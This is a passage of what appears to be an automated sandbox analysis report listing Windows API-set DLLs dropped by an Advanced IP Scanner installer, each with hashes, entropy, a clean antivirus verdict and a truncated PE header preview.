                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):6.95985126360952
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:8l6W2hWJ7QA0GftpBj8VbJOAlXBtFwA+S:p+yi2VbJy4
                                                                                                                                                                                                  MD5:1CD8672D8C08B39560A9D5518836493E
                                                                                                                                                                                                  SHA1:C7CE2330265D07D88AD15F80DD88473F3DAAFCD0
                                                                                                                                                                                                  SHA-256:4A5F33A0837A9D9F22D49EE6D062BAE671A4C5C5522DB6FFE03C1AA2C0BD008E
                                                                                                                                                                                                  SHA-512:6BCE6EF09746C10E3B3F136BB2CE67002F27FF70C3FCBA48E7F1C3769000A62649A41FD82ACBE2A819B8ECE96D8E9399B15104CA2B40F65B51A0C84FC2A7901C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):6.9718846004654225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:8vlYsFeW2hWu7QA0GftpBjECp4DlXBtFwCf:8izyiChyG
                                                                                                                                                                                                  MD5:B8BB783DEE4EA95576882625C365E616
                                                                                                                                                                                                  SHA1:E9AF4B17FC082B5D717BFA013D46DA4BDFFB2CD3
                                                                                                                                                                                                  SHA-256:21BD55B9D42A5FAA5FA3C5DD9FAD1665DF3C33557CC4F7A58248A88B69D372B8
                                                                                                                                                                                                  SHA-512:B756468DCF7254FD31D3650F794B837724A82207001B521105BE05DF4CF187785897BE8377083C53A92C0DC5AEE2CDAF8B9538FD6944E0AC4BE5D286836037A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......`....@.......................................... ...................<..............8............................................................................text...$........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.018574692016083
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
                                                                                                                                                                                                  MD5:44CA070DC5C09FF8588CF6CDCB64E7A2
                                                                                                                                                                                                  SHA1:63D1DA68CD984532217BEACC21B868B46EC5D910
                                                                                                                                                                                                  SHA-256:EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
                                                                                                                                                                                                  SHA-512:C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21184
                                                                                                                                                                                                  Entropy (8bit):6.98505637818331
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
                                                                                                                                                                                                  MD5:3B9D034CA8A0345BC8F248927A86BF22
                                                                                                                                                                                                  SHA1:95FAF5007DAF8BA712A5D17F865F0E7938DA662B
                                                                                                                                                                                                  SHA-256:A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
                                                                                                                                                                                                  SHA-512:04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):6.986049300390525
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
                                                                                                                                                                                                  MD5:FC13F11A2458879B23C87B29C2BAD934
                                                                                                                                                                                                  SHA1:68B15CC21F5541DC2226E9E967E08AF81D04A537
                                                                                                                                                                                                  SHA-256:624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
                                                                                                                                                                                                  SHA-512:801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.04628745407397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:bhkd6WVghW/vt7l9YOCAs/nGfe4pBjSfWP18gWNArXVWQ4mW0tXqnajL1dHx3tKU:aYW2hWt7QA0GftpBj7PS8rxlXBtFwVoF
                                                                                                                                                                                                  MD5:07954AF744363F9807355E4E9408DF45
                                                                                                                                                                                                  SHA1:B37D06B39EB7186B55CEAE25427B7AB95E46E32F
                                                                                                                                                                                                  SHA-256:4B20AAF0E3B7566B797652F8D84B749AB23F7D1557DBA882C0590FE1BE98CED6
                                                                                                                                                                                                  SHA-512:B7A7C16EF8BE62D9F562DCECF01B2AD1C066DE92AA4CA7A8C7BB93A80B1BC781F8A6A47F51A252E40337BD8D7778CACFEE7488A5FAD15F11D24C90572AD0E4C6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.961454559139268
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:GkZjWVghW/WgbXH9YOCAs/nGfe4pBjSfr4i6wWNArXVWQ4mWQVUqnajMHxxBNT0u:fjW2hWegbCA0GftpBjc4aolI663Ub2
                                                                                                                                                                                                  MD5:39556E904FA2405ABAF27231DA8EF9E5
                                                                                                                                                                                                  SHA1:89DB01B04DFDBE5C0F5E856050611A6A72F1AFD0
                                                                                                                                                                                                  SHA-256:5F476627A904B182D9B3F142594DEFA267DB3CE8206BAC24AF063A29635B3A8B
                                                                                                                                                                                                  SHA-512:558C0D0DD0CE24C7DCDEBAE64578E09ACC36A86B6F121266A147394DD9E8F8B2B81726B9CCC24ED07755950CD13C1D34CAB137E995D0BE25EBF52699D0FBB6B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......B.....@......................... ...G............ ...................<..............8............................................................................text...g........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20672
                                                                                                                                                                                                  Entropy (8bit):6.988142648004873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
                                                                                                                                                                                                  MD5:39047E168FFBDD19185504633D6ECA29
                                                                                                                                                                                                  SHA1:FE3423689EFEDADA19C7DEC3D5DD077A057BF379
                                                                                                                                                                                                  SHA-256:611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
                                                                                                                                                                                                  SHA-512:8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......~.....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.000917619737006
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:QgxDfIeJWVghW/c7l9YOCAs/nGfe4pBjSfxyWNArXVWQ4mWgBHqnaj9RlS6V6Qg:JDfIeJW2hWk7QA0GftpBjxdBHlBRAky
                                                                                                                                                                                                  MD5:C2EAD5FCCE95A04D31810768A3D44D57
                                                                                                                                                                                                  SHA1:96E791B4D217B3612B0263E8DF2F00009D5AF8D8
                                                                                                                                                                                                  SHA-256:42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62
                                                                                                                                                                                                  SHA-512:C90048481D8F0A5EDA2EB6E7703B5A064F481BB7D8C78970408B374CB82E89FEBC2E36633F1F3E28323FB633D6A95AA1050A626CB0CB5EC62E9010491AAE91F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18112
                                                                                                                                                                                                  Entropy (8bit):7.0782836442636174
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
                                                                                                                                                                                                  MD5:7697F94ED76B22D83D677B999EDFC2E1
                                                                                                                                                                                                  SHA1:42AFB5B8E76B8B77D845156B7124CC3E0C613F91
                                                                                                                                                                                                  SHA-256:50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
                                                                                                                                                                                                  SHA-512:1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18112
                                                                                                                                                                                                  Entropy (8bit):7.072469017642331
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
                                                                                                                                                                                                  MD5:FDF0B4BF0214585E18EE2F6978F985B0
                                                                                                                                                                                                  SHA1:0FE247F8CCA0C04729135EE612FBFCED92D59D9D
                                                                                                                                                                                                  SHA-256:CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
                                                                                                                                                                                                  SHA-512:D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.021897050678374
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
                                                                                                                                                                                                  MD5:687533A89B43510CCE4D8B2ECB261AA0
                                                                                                                                                                                                  SHA1:4004BA63880A92042C106FF6A549C6F5F69CE05D
                                                                                                                                                                                                  SHA-256:E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
                                                                                                                                                                                                  SHA-512:6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20672
                                                                                                                                                                                                  Entropy (8bit):6.936138213943514
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:wdv3V0dfpkXc0vVafW2hWqSUA0GftpBjjQjclvQyURz82u6:wdv3VqpkXc0vVaBziRvU22u6
                                                                                                                                                                                                  MD5:88C4CA509C947509E123F22E5F077639
                                                                                                                                                                                                  SHA1:AE837C556FF23B9E166288A11E409D21BDDDA4ED
                                                                                                                                                                                                  SHA-256:0787FD3D9606B8614F9073C5F04CC6CB153BBF2992297CEBB8C537C066A78C9F
                                                                                                                                                                                                  SHA-512:3CCE8C4EA63019ADC6383D5DA7F5969B0B10A55CEEF29083E21F04D23377305325C5CB5F4656955F8ABB5A1E10BEEAC60808DE9D03A72462950469AE49768418
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......a.....@.............................V............ ...................<..............8............................................................................text...f........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.030340698171656
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:/tZ34W2hWlgbCA0GftpBjx5C32lI663UG:w18i+66kG
                                                                                                                                                                                                  MD5:F6B4D8D403D22EB87A60BF6E4A3E7041
                                                                                                                                                                                                  SHA1:B51A63F258B57527549D5331C405EACC77969433
                                                                                                                                                                                                  SHA-256:25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
                                                                                                                                                                                                  SHA-512:1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.960490184684636
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
                                                                                                                                                                                                  MD5:B9EA058418BE64F85B0FF62341F7099E
                                                                                                                                                                                                  SHA1:0B37E86267D0C6782E18F734B710817B8B03DA76
                                                                                                                                                                                                  SHA-256:653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
                                                                                                                                                                                                  SHA-512:EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.0606914357897885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
                                                                                                                                                                                                  MD5:A20084F41B3F1C549D6625C790B72268
                                                                                                                                                                                                  SHA1:E3669B8D89402A047BFBF9775D18438B0D95437E
                                                                                                                                                                                                  SHA-256:0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
                                                                                                                                                                                                  SHA-512:DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):6.97908669425612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
                                                                                                                                                                                                  MD5:2886C75F8B9D3EFDF315C44B52847AEE
                                                                                                                                                                                                  SHA1:4FC75E39493B356F1F219798E3738DBC764281E4
                                                                                                                                                                                                  SHA-256:3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
                                                                                                                                                                                                  SHA-512:2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
